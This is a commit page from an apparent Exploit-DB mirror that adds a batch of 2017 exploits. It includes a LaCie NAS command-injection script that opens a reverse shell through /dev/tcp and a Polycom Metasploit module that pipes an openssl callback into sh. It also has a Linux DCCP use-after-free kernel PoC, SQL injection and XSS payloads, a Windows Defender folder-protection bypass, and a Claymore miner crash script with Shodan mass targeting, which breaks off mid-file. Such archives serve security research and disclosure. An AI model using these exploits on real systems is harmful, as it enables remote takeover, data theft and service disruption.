bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2017-12-08

Browse source 
9 changes to exploits/shellcodes

Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path
Wireshark 2.4.0 - 2.4.2 / 2.2.0 - 2.2.10 - CIP Safety Dissector Crash
Linux Kernel - DCCP Socket Use-After-Free
LaCie 5big Network 2.2.8 - Command Injection
Polycom Shell HDX Series - Traceroute Command Execution (Metasploit)
Claymore Dual ETH + DCR/SC/LBC/PASC GPU Miner - Stack Buffer Overflow / Path Traversal
FS IMDB Clone - 'id' SQL Injection
FS Facebook Clone - 'token' SQL Injection
OpenEMR 5.0.0 - OS Command Injection / Cross-Site Scripting
This commit is contained in:
Offensive Security 2017-12-08 05:02:13 +00:00
parent 08d2346400
commit b546191ef2
10 changed files with 1017 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

96
exploits/cgi/remote/43226.py Executable file
View file

@ -0,0 +1,96 @@
#!/usr/bin/python
# Exploit Title: LaCie 5big Network 2.2.8 Command Injection
# Date: 2017-12-04
# Exploit Author: Timo Sablowski
# Contact: ${lastname}@tyntec.com
# Vendor Homepage: http://www.lacie.com
# Software Link: http://www.lacie.com/files/lacie-content/download/drivers/5%20Big%20Network.zip
# Version: 2.2.8
# Tested on: Linux
# Platform: Hardware
#
# Command Injection Vulnerability (with root privileges) in LaCie's
# 5big Network appliance running firmware version 2.2.8.
# Just open a netcat listener and run this script to receive a reverse
# shell to exploit the vulnerability.
#
# This exploit has been released to Seagate in accordance to their
# responsible disclosure program and is meant to be used for testing
# and educational purposes only.
# Please do not use it against any system without prior permission.
# Use at your own risk.
#
# Timeline:
# 2017-09-13: Discovery
# 2017-10-04: Reporting to Seagate
# asking to fix the issue until 2017-12-04
# 2017-11-07: Seagate stating to not fix the vulnerability as the
# product has been EOL for a long time
import sys, getopt, os, urllib
url_addition = "/cgi-bin/public/edconfd.cgi?method=getChallenge&login="
blank_payload = "admin|#' ||`/bin/sh -i > /dev/tcp/IP/PORT 0<&1 2>&1` #\\\""
def help():
print "Usage:"
print "%s -u <baseurl> -l <listener> -p <port>" %os.path.basename(sys.argv[0])
print ""
print "<baseurl> identifies the target's URL, e.g. http://10.0.0.1:8080"
print "<listener> sets the IP where the attacked system connects back to"
print "<port> defines the listening port"
print ""
print "Example: attack LaCie system to connect back to a remote machine (do not forget to open a netcat session)"
print "\t %s -u http://10.0.0.1 -l 192.168.0.1 -p 4444" %os.path.basename(sys.argv[0])
def create_payload(blank_payload, listener, port):
print "[+] Generating payload with IP %s and port %s" %(listener, str(port))
payload = blank_payload.replace("IP", listener).replace("PORT", str(port))
payload = urllib.quote(payload, safe='')
return payload
def send_payload(injected_url):
print "[+] Sending payload, this might take a few seconds ..."
print "[+] Check your listener"
try:
urllib.urlopen(injected_url)
except:
raise
def main():
try:
opts, args = getopt.getopt(sys.argv[1:],"hu:l:p:")
except:
help()
sys.exit(1)
for opt, arg in opts:
if opt == '-h':
help()
sys.exit()
elif opt in ("-u"):
url = arg
elif opt in ("-l"):
listener = arg
elif opt in ("-p"):
port = int(arg)
try:
url
listener
port
except:
help()
sys.exit(1)
payload = create_payload(blank_payload, listener, port)
injected_url = "%s%s%s" %(url, url_addition, payload)
send_payload(injected_url)
if __name__ == "__main__":
main()

146
exploits/linux/dos/43234.c Normal file
View file

@ -0,0 +1,146 @@
/*
This is an announcement for CVE-2017-8824 which is a use-after-free
vulnerability
I found in Linux DCCP socket. It can be used to gain kernel code execution
from unprivileged processes.
Youll find in attachment the proof of concept code and the kernel panic
log.
####### BUG DETAILS ############
When a socket sock object is in DCCP_LISTEN state and connect() system
call is being called with AF_UNSPEC,
the dccp_disconnect() puts sock state into DCCP_CLOSED, and forgets to free
dccps_hc_rx_ccid/dccps_hc_tx_ccid and assigns NULL to them,
then when we call connect() again with AF_INET6 sockaddr family, the sock
object gets cloned via dccp_create_openreq_child() and returns a new sock
object,
which holds references of dccps_hc_rx_ccid and dccps_hc_tx_ccid of the old
sock object, and this leads to both the old and new sock objects can use
the same memory.
####### LINKS ############
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-8824
http://lists.openwall.net/netdev/2017/12/04/224
####### CREDITS ############
Mohamed Ghannam
*/
/*This poc has been tested on my custom kernel reseach in ubuntu 4.10.5, the same thing applies to other versions
* if you don't see RIP control, that means file_security_alloc is not called, so we should look for other similar object
* */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <netinet/in.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/mman.h>
int fd1,fd2;
struct sockaddr_in6 in1,in2;
int do_uaf()
{
struct sockaddr_in6 cin1,cin2;
fd1 = socket(0xa,6,0);
memset(&in1,0,sizeof(in1));
in1.sin6_family = AF_INET6;
in1.sin6_addr = in6addr_loopback;
in1.sin6_port = 0x214e;//htons(0x1000);
bind(fd1,(struct sockaddr*)&in1,sizeof(in1));
listen(fd1,0x1);
fd2 = socket(0xa,6,0);
memset(&cin1,0,sizeof(cin1));
cin1.sin6_family = AF_INET6;
cin1.sin6_addr = in6addr_loopback;
cin1.sin6_port = 0x214e;//htons(0x1000);
cin1.sin6_flowinfo = 0;
connect(fd2,(struct sockaddr*)&cin1,sizeof(cin1));
memset(&cin2,0,sizeof(cin2));
connect(fd1,(struct sockaddr*)&cin2,sizeof(cin2));
memset(&in2,0,sizeof(in2));
in2.sin6_family = AF_INET6;
in2.sin6_addr = in6addr_loopback;
in2.sin6_port = htons(0x2000);
in2.sin6_flowinfo = 0x2;
in2.sin6_scope_id = 6;
bind(fd2,(struct sockaddr*)&in2,sizeof(in2));
struct sockaddr_in6 cin3;
memset(&cin3,0,sizeof(cin3));
connect(fd2,(struct sockaddr*)&cin3,sizeof(cin3));
listen(fd2,0xb1);
struct sockaddr_in6 cin4;
memset(&cin4,0,sizeof(cin4));
cin4.sin6_family = AF_INET6;
cin4.sin6_port = htons(0x2000);//htons(0x3000);
memset(&cin4.sin6_addr,0,sizeof(struct in6_addr));
cin4.sin6_flowinfo = 1;
cin4.sin6_scope_id = 0x32f1;
connect(fd1,(struct sockaddr*)&cin4,sizeof(cin4));
return fd2;
}
void * alloc_umem(void *addr,size_t size)
{
addr = mmap((void*)0x100000000,4096,PROT_READ | PROT_WRITE | PROT_EXEC,MAP_SHARED|MAP_ANONYMOUS,-1,0);
if(addr == (char *)-1) {
perror("mmap");
return NULL;
}
return addr;
}
int main(void)
{
char *addr;
addr = (char *)alloc_umem((void*)0x100000000,4096);
if(addr == NULL)
exit(0);
memset(addr,0xcc,4096);
*(unsigned long *)(addr + 0x79) = 0xdeadbeef; /* RIP control */
do_uaf();
socket(AF_INET,SOCK_STREAM,0);
close(fd2);
return 0;
}

28
exploits/multiple/dos/43233.txt Normal file
View file

@ -0,0 +1,28 @@
Summary
Name: CIP Safety dissector crash
Docid: wnpa-sec-2017-49
Date: November 30, 2017
Affected versions: 2.4.0 to 2.4.2, 2.2.0 to 2.2.10
Fixed versions: 2.4.3, 2.2.11
References:
Wireshark bug 14250
Details
Description
The CIP Safety dissector could crash.
Impact
It may be possible to make Wireshark crash by injecting a malformed packet onto the wire or by convincing someone to read a malformed packet trace file.
Resolution
Upgrade to Wireshark 2.4.3, 2.2.11 or later.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43233.zip

32
exploits/php/webapps/43227.txt Normal file
View file

@ -0,0 +1,32 @@
# Exploit Title: FS IMDB Clone - 'id' SQL Injection
# Date: 2017-12-06
# Exploit Author: Dan°
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/imdb-clone/
# Version: 2017-12-06
# Tested on: Kali Linux 2.0
(PoC):
SQL Injection on GET parameter = id
http://localhost/show_misc_video.php?id=1
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 7861=7861
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: id=1 AND (SELECT 2902 FROM(SELECT
COUNT(*),CONCAT(0x71766b6271,(SELECT
(ELT(2902=2902,1))),0x71707a7071,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-5831 UNION ALL SELECT
NULL,CONCAT(0x71766b6271,0x454e4e656f6a7a4676744c594479535a49667041726266686f6d6b46774d67425a7a4e5857617065,0x71707a7071),NULL,NULL,NULL,NULL,NULL,NULL--
WuUS
---

29
exploits/php/webapps/43228.txt Normal file
View file

@ -0,0 +1,29 @@
# Exploit Title: FS Facebook Clone - 'token' SQL Injection
# Date: 2017-12-06
# Exploit Author: Dan°
# Vendor Homepage: https://fortunescripts.com/
# Software Link: https://fortunescripts.com/product/facebook-clone/
# Version: 2017-12-06
# Tested on: Kali Linux 2.0
(PoC):
SQL Injection on GET parameter = token
http://localhost/group.php?token=
---
Parameter: token (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: token=6595c4ca4238a0b923820dcc509a6f75849b' AND 8810=8810--
IYhZ
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: token=6595c4ca4238a0b923820dcc509a6f75849b' AND SLEEP(5)-- Eljm
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: token=-8316' UNION ALL SELECT
NULL,NULL,NULL,CONCAT(0x7178767171,0x546d597a6367557a70475a5042514e77654249574c766772746e7a557579724267574a6d59544368,0x71766a6a71),NULL,NULL,NULL,NULL,NULL--
sphZ
---

185
exploits/php/webapps/43232.txt Normal file
View file

@ -0,0 +1,185 @@
SEC Consult Vulnerability Lab Security Advisory < 20171130-1 >
=======================================================================
title: OS Command Injection & Reflected Cross Site Scripting
product: OpenEMR
vulnerable version: 5.0.0
fixed version: 5.0.0 Patch 2 or higher
CVE number: -
impact: Critical
homepage: http://www.open-emr.org/
found: 2017-03-03
by: Wan Ikram (Office Kuala Lumpur)
Fikri Fadzil (Office Kuala Lumpur)
Jasveer Singh (Office Kuala Lumpur)
SEC Consult Vulnerability Lab
An integrated part of SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
https://www.sec-consult.com
=======================================================================
Vendor description:
-------------------
"OpenEMR is the most popular open source electronic health records and medical
practice management solution. ONC certified with international usage,
OpenEMR's goal is a superior alternative to its proprietary counterparts."
Source: http://www.open-emr.org/
Business recommendation:
------------------------
By exploiting the vulnerability documented in this advisory, an attacker can
fully compromise the web server which has OpenEMR installed. Potentially
sensitive health care and medical data might get exposed through this attack.
SEC Consult recommends not to attach OpenEMR to the network until a thorough
security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
-----------------------------------
1. OS Command Injection
Any OS commands can be injected by an authenticated attacker with any role.
This is a serious vulnerability as the chance for the system to be fully
compromised is very high.
2. Reflected Cross Site Scripting
This vulnerability allows an attacker to inject malicious client side
scripting which will be executed in the browser of users if they visit the
manipulated site. There are different issues affecting various components.
The flash component has not been fixed yet as OpenEMR is looking for a
replacement component.
Proof of concept:
-----------------
1. OS Command Injection
Below is the detail of a HTTP request that needs to be sent to execute arbitrary
OS commands through "fax_dispatch.php".
URL : http://$DOMAIN/interface/fax/fax_dispatch.php?scan=x
METHOD : POST
PAYLOAD : form_save=1&form_cb_copy=1&form_cb_copy_type=1&form_images[]=x&form_
filename='||<os-commands-here>||'&form_pid=1
2. Reflected Cross Site Scripting
The following URL parameters have been identified to be vulnerable against
reflected cross site scripting:
The following payload shows a simple alert message box:
a)
URL : http://$DOMAIN/library/openflashchart/open-flash-chart.swf
METHOD : GET
PAYLOAD : [PoC removed as no fix is available]
b)
URL :
http://$DOMAIN/library/custom_template/ckeditor/_samples/assets/_posteddata.php
METHOD : POST
PAYLOAD : <script>alert('xss');</script>=SENDF
Vulnerable / tested versions:
-----------------------------
OpenEMR version 5.0.0 has been tested. This version was the latest
at the time the security vulnerability was discovered.
Vendor contact timeline:
------------------------
2017-03-08: Contacting vendor through email.
2017-03-08: Vendor replied with his public key. Advisory sent through secure
channel.
2017-03-17: Asked for a status update from the vendor.
2017-03-17: Vendor confirms the vulnerabilities and working on the fixes.
2017-03-31: Asked for a status update from the vendor.
2017-03-31: Vendor informed that they have fixed OS Command Injection and are
currently working on fixes for Reflected Cross Site Scripting.
2017-04-25: Vendor requesting extension for deadline of 32 days from the
latest possible release date.
2017-05-25: Asked for a status update from the vendor.
2017-05-29: Vendor informed that they are working on the fixes.
2017-06-06: Asked for a status update from the vendor.
2017-06-12: Vendor informed that they added solution into the development
codebase.
2017-07-05: Asked for a status update from the vendor.
2017-07-10: Vendor informed patch is delayed due to another critical bug
fixes.
2017-08-17: Asked for a status update from the vendor. No reply.
2017-08-24: Asked for a status update from the vendor.
2017-08-29: Vendor informed patch will be out soon.
2017-08-30: Asked vendor for specific release date for patch. No reply.
2017-09-08: Asked for a status update from the vendor. No reply.
2017-09-14: Asked for a status update from the vendor.
2017-09-18: Vendor informed that they are testing their patch. No estimation
yet on the patch release date.
2017-10-17: Asked for a status update from the vendor. No reply.
2017-10-30: Asked for a status update from the vendor.
2017-10-31: Vendor informed that the patch will be released as soon as
possible.
2017-11-15: Asked for a status update from the vendor.
2017-11-21: Vendor informed that they are working on other vulnerabilities
2017-11-30: Public release of SEC Consult advisory.
Solution:
---------
The vendor has fixed the code execution issue and XSS 2b) in GIT in March 2017:
https://github.com/openemr/openemr/commit/ee0945a30dbb17ceee82b9b553d7dcb177710ca8#diff-1fdae02fadfcbc6147352cdc7c63279a
The fix has been incorporated in 5.0.0 Patch 2 or higher.
The XSS example 2a (flash) is not yet fixed.
Because of critical security issues (CVE-2017-16540) of other security
researchers it is highly recommended to upgrade to at least version
5.0.0 Patch 6 immediately.
http://www.open-emr.org/wiki/index.php/OpenEMR_Patches
Workaround:
-----------
None
Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab
SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://sec-consult.com/en/career/index.html
Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult
EOF Jasveer Singh / @2017

177
exploits/unix/remote/43230.rb Executable file
View file

@ -0,0 +1,177 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Polycom Shell HDX Series Traceroute Command Execution',
'Description' => %q{
Within Polycom command shell, a command execution flaw exists in
lan traceroute, one of the dev commands, which allows for an
attacker to execute arbitrary payloads with telnet or openssl.
},
'Author' => [
'Mumbai', #
'staaldraad', # https://twitter.com/_staaldraad/
'Paul Haas <Paul [dot] Haas [at] Security-Assessment.com>', # took some of the code from polycom_hdx_auth_bypass
'h00die <mike@shorebreaksecurity.com>' # stole the code, creds to them
],
'References' => [
['URL', 'https://staaldraad.github.io/2017/11/12/polycom-hdx-rce/']
],
'DisclosureDate' => 'Nov 12 2017',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' => [[ 'Automatic', {} ]],
'Payload' => {
'Space' => 8000,
'DisableNops' => true,
'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'telnet generic openssl'}
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse' },
'DefaultTarget' => 0
))
register_options(
[
Opt::RHOST(),
Opt::RPORT(23),
OptString.new('PASSWORD', [ false, "Password to access console interface if required."]),
OptAddress.new('CBHOST', [ false, "The listener address used for staging the final payload" ]),
OptPort.new('CBPORT', [ false, "The listener port used for staging the final payload" ])
])
end
def check
connect
Rex.sleep(1)
res = sock.get_once
disconnect
if !res && !res.empty?
return Exploit::CheckCode::Unknown
elsif res =~ /Welcome to ViewStation/ || res =~ /Polycom/
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Unknown
end
def exploit
unless check == Exploit::CheckCode::Detected
fail_with(Failure::Unknown, "#{peer} - Failed to connect to target service")
end
#
# Obtain banner information
#
sock = connect
Rex.sleep(2)
banner = sock.get_once
vprint_status("Received #{banner.length} bytes from service")
vprint_line("#{banner}")
if banner =~ /password/i
print_status("Authentication enabled on device, authenticating with target...")
if datastore['PASSWORD'].nil?
print_error("#{peer} - Please supply a password to authenticate with")
return
end
# couldnt find where to enable auth in web interface or telnet...but according to other module it exists..here in case.
sock.put("#{datastore['PASSWORD']}\n")
res = sock.get_once
if res =~ /Polycom/
print_good("#{peer} - Authenticated successfully with target.")
elsif res =~ /failed/
print_error("#{peer} - Invalid credentials for target.")
return
end
elsif banner =~ /Polycom/ # praise jesus
print_good("#{peer} - Device has no authentication, excellent!")
end
do_payload(sock)
end
def do_payload(sock)
# Prefer CBHOST, but use LHOST, or autodetect the IP otherwise
cbhost = datastore['CBHOST'] || datastore['LHOST'] || Rex::Socket.source_address(datastore['RHOST'])
# Start a listener
start_listener(true)
# Figure out the port we picked
cbport = self.service.getsockname[2]
cmd = "devcmds\nlan traceroute `openssl${IFS}s_client${IFS}-quiet${IFS}-host${IFS}#{cbhost}${IFS}-port${IFS}#{cbport}|sh`\n"
sock.put(cmd)
if datastore['VERBOSE']
Rex.sleep(2)
resp = sock.get_once
vprint_status("Received #{resp.length} bytes in response")
vprint_line(resp)
end
# Give time for our command to be queued and executed
1.upto(5) do
Rex.sleep(1)
break if session_created?
end
end
def stage_final_payload(cli)
print_good("Sending payload of #{payload.encoded.length} bytes to #{cli.peerhost}:#{cli.peerport}...")
cli.put(payload.encoded + "\n")
end
def start_listener(ssl = false)
comm = datastore['ListenerComm']
if comm == 'local'
comm = ::Rex::Socket::Comm::Local
else
comm = nil
end
self.service = Rex::Socket::TcpServer.create(
'LocalPort' => datastore['CBPORT'],
'SSL' => ssl,
'SSLCert' => datastore['SSLCert'],
'Comm' => comm,
'Context' =>
{
'Msf' => framework,
'MsfExploit' => self
}
)
self.service.on_client_connect_proc = proc { |client|
stage_final_payload(client)
}
# Start the listening service
self.service.start
end
# Shut down any running services
def cleanup
super
if self.service
print_status("Shutting down payload stager listener...")
begin
self.service.deref if self.service.is_a?(Rex::Service)
if self.service.is_a?(Rex::Socket)
self.service.close
self.service.stop
end
self.service = nil
rescue ::Exception
end
end
end
# Accessor for our TCP payload stager
attr_accessor :service
end

67
exploits/windows/dos/43229.cs Normal file
View file

@ -0,0 +1,67 @@
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1418
Windows Defender: Controlled Folder Bypass through UNC Path
Platform: Windows 10 1709 + Antimalware client version 4.12.16299.15
Class: Security Feature Bypass
Summary: You can bypass the controlled folder feature in Defender in Windows 10 1709 using a local UNC admin share.
Description:
It was hard not to just blog about this issue, as its so obvious and you must known about already, but I thought better of it. Im sure it wouldnt help my efforts to mend our fractured relationship :-)
Controlled Folder access seems to be based on a blacklist, which is fine as far as it goes. I didnt bother to dig too deeply but Id assume youre using a filter driver, when you get a hit in the blacklist you reduce the access rights down to a set of read-only rights then return to the caller. This prevents a malicious application deleting or modifying the file because it doesnt have the access rights to do so. Therefore it then becomes a task of finding a way of accessing the protected file which circumvents the blacklist.
The obvious one for me to try was local UNC admin share, which goes over between the SMB client and SMB server drivers. And this works just fine to open the target file for write/delete access and therefore circumvent the controlled folders feature. As in if you want to access c:\protected\file.txt you open \\localhost\c$\protected\file.txt. While you can only do this as an unsandboxed user you wouldnt be able to access the file from a sandbox anyway. I did try a few others just to see such as mount points and hardlinks and those seem to be protected as far as I could tell in my limited efforts.
As I said I didnt look too hard but it would be reasonable to assume as to why this works:
* The actual file is opened in the System process which it likely to be trusted
* The path the filter driver actually sees is the UNC path which isnt in the blacklist.
You can fix this by adding the UNC path to the list of protected folders, however youve got so many ways of bypassing it. For example if you block \\localhost\c$\... you can bypass with \\127.0.0.1\c$\... or the real fun one of IPv6 localhost which has many potential representations such as 0::0:0:1 and ::1 etc. You could probably also set up a DNS host which resolves to localhost and just have completely random subdomains. So Im not sure how youd fix it, perhaps thats why it works as it was too hard?
While I understand the rationale for this feature, to leave such a large hole (and then brag about how awesome it is) is a perfect demonstration of the AV fallacy that it blocks everything as long as no one actually tries to bypass the protection. Perhaps some better security testing before shipping it might have been in order as if I can find it so can the Ransomware authors, it wouldnt take them long to adapt, and then youd end up with egg on your face.
Also while its not a security issue it seems if you open a file and request MAXIMUM_ALLOWED youd normally get SYNCHRONIZE access. However when the file is in a controlled location you dont, you only get FILE_GENERIC_READ and SYNCHRONIZE is missing. While you can still get SYNCHRONIZE if you explicitly ask for it (so calling CreateFile should be okay) if youre calling the native API you wont. I could imagine this might break some drivers if they relied on being able to SYNCHRONIZE on a MAXIMUM_ALLOWED handle. Perhaps you can pass this along?
Proof of Concept:
Ive provided a PoC as a C# project. You could easily do this with PowerShell or CMD as they dont seem to be trusted but this proves its not some fluke due to a MS binary.
1) Compile the C# source.
2) Enable Controlled Folder Access option with default configuration.
3) Create a file in a protected location such as the users Desktop folder with an approved application such as explorer.
4) Run the poc passing the local filesystem path, e.g. c:\users\user\desktop\file.txt
5) Run the poc passing a local UNC admin share path e.g. \\localhost\c$\users\user\desktop\file.txt
Expected Result:
Controlled folder access should block both file paths.
Observed Result:
Defender blocks the direct path but doesnt block the one via UNC and the protected file is deleted.
Sent MSRC a note that if they're planning on fixing they should be careful if the fix involves parsing the UNC path out as you could circumvent that using a mount point which wouldn't be reflected in the requested path but would result in opening a arbitrary target file.
Microsoft consider this feature defense in depth (which is certainly is I suppose) and so this is only consider possible fix in vnext. Marking it as WontFix.
*/
using System;
using System.IO;
class MainClass {
static void Main(string[] args) {
if (args.Length < 1) {
Console.WriteLine("Specify file path");
return;
}
try {
File.Delete(args[0]);
Console.WriteLine("Done");
} catch(Exception ex) {
Console.WriteLine(ex.Message);
}
}
}

248
exploits/windows/remote/43231.py Executable file
View file

@ -0,0 +1,248 @@
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
# github.com/tintinweb
#
#
# optional: pip install pysocks (https://pypi.python.org/pypi/PySocks)
#
#
'''
API overview:
# >nc -L -p 3333
{"id":0,"jsonrpc":"2.0","method":"miner_getstat1"}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["epools.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_getfile","params":["config.txt"]}
{"id":0,"jsonrpc":"2.0","method":"miner_restart"}
{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "1"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["-1", "0"]}
{"id":0,"jsonrpc":"2.0","method":"control_gpu","params":["0", "2"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["config.txt","<encoded>"]}
{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["dpools.txt","<encoded>"]}
Exec:
#> EthDcrMiner64.exe -epool http://192.168.0.1:8545 -mport -3333
Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner v10.0 ║
...
Total cards: 1
ETH - connecting to 192.168.0.1:8545
DUAL MINING MODE ENABLED: ETHEREUM+DECRED
DCR: Stratum - connecting to 'pasc-eu2.nanopool.org' <213.32.29.168> port 15555
ETH: HTTP SOLO mode
Ethereum HTTP requests time (-etht) is set to 200 ms
Watchdog enabled
Remote management (READ-ONLY MODE) is enabled on port 3333
DCR: Stratum - Connected (pasc-eu2.nanopool.org:15555)
DCR: Authorized
DCR: 11/22/17-22:05:12 - New job from pasc-eu2.nanopool.org:15555
... <run poc.py --vector=method <target>>
GPU0 t=57C fan=0%
Remote management: unknown command miner_getstat1 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
.... <crash>
PoC:
#> poc.py 127.0.0.1:3333
[poc.py - <module>() ][ INFO] --start--
[poc.py - <module>() ][ INFO] # Claymore's Dual ETH + DCR/SC/LBC/PASC GPU Miner - Remote Buffer Overwrite
[poc.py - <module>() ][ INFO] # github.com/tintinweb
[poc.py - iter_targets() ][ WARNING] shodan apikey missing! shodan support disabled.
[poc.py - <module>() ][ INFO] [i] Target: 127.0.0.1:3333
[poc.py - <module>() ][ INFO] [+] connected.
[poc.py - <module>() ][ INFO] [+] peer disappeared. vulnerable!
[poc.py - <module>() ][ WARNING] error(10054, 'Eine vorhandene Verbindung wurde vom Remotehost geschlossen')
[poc.py - <module>() ][ INFO] --done--
'''
import logging
import json
import time
import argparse
import socket
try:
import socks
except ImportError:
print "!! cannot import socks. no socks support!"
socks = None
try:
import shodan
except ImportError:
print "!! cannot import shodan. no shodan support!"
shodan = None
LOGGER = logging.getLogger(__name__)
class MinerRpc(object):
"""
Generic MinerRpc class with socks support
"""
def __init__(self):
self.sock = None
def connect(self, host, port, proxy=None, timeout=15):
if socks:
self.sock = socks.socksocket()
else:
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(timeout)
if proxy:
if not socks:
raise Exception("socks support disabled due to unmet dependency. please install pysocks")
self.sock.set_proxy(*proxy)
return self.sock.connect((host, port))
def sendRcv(self, msg, chunksize=4096):
self.sock.sendall(msg)
chunks = []
chunk = None
#time.sleep(2)
while chunk is None or len(chunk)==chunksize:
chunk = self.sock.recv(chunksize)
chunks.append(chunk)
return "".join(chunks)
def sendRcvTimed(self, msg, chunksize=1):
self.sock.sendall(msg)
start = time.time()
resp = self.sock.recv(chunksize)
diff = time.time()-start
return diff, resp
class Utils:
"""
Utility namespace
"""
@staticmethod
def iter_targets(targets, shodan_apikey):
shodan_api = None
if not shodan:
LOGGER.warning(
"[i] starting without shodan support. please pip install shodan to use shodan search strings.")
else:
if not shodan_apikey:
LOGGER.warning("shodan apikey missing! shodan support disabled.")
else:
shodan_api = shodan.Shodan(shodan_apikey)
for target in targets:
if target.startswith("shodan://"):
target = target.replace("shodan://", "")
if shodan_api:
for t in shodan_api.search(target)['matches']:
yield t['ip_str'], t['port']
else:
host,port = target.strip().split(":")
yield host,int(port)
VECTORS = {
# Vector: extrafield
# Description: overly long value for field. overly long overall msg
# Result: crashes always, even though
# * password required
# * readonly mode (-<port>)
"extrafield" : {"id": 1,
"jsonrpc": "2.0",
"lol": "a" * 145000, ##<<--
"method": "miner_getstat1 ", },
# Vector: psw (basically same as extrafield)
# Description: overly long value for psw. overly long overall msg
# Result: crashes always, even though
# * password required
# * readonly mode (-<port>)
"psw" : { "id": 1,
"psw":"d"*145000, ##<<--
"jsonrpc": "2.0",
"method": "miner_getstat1", },
# Vector: method
# Description: overly long value for field. overly long overall msg
# Result: crashes always, even though
# * readonly mode (-<port>)
"method" : {"id": 1,
"jsonrpc": "2.0",
"method": "miner_getstat1 " + "a" * (16384 - 50 - 15 - 5), }, ##<<--
# Vector: traversal
# Description: path traversal
# Result: retrieves any file
